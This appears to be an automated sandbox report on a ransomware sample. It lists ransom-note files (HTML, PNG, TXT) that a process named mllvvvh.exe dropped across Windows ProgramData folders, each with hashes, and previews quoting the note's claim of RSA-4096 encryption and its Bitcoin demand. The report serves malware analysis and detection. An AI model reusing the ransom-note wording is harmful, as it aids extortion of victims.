                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\OFFICE\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\OFFICE\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\OFFICE\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\AssetCache\CellularUx\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\AssetCache\CellularUx\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\AssetCache\CellularUx\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\AssetCache\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\AssetCache\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\AssetCache\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Microsoft\Provisioning\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
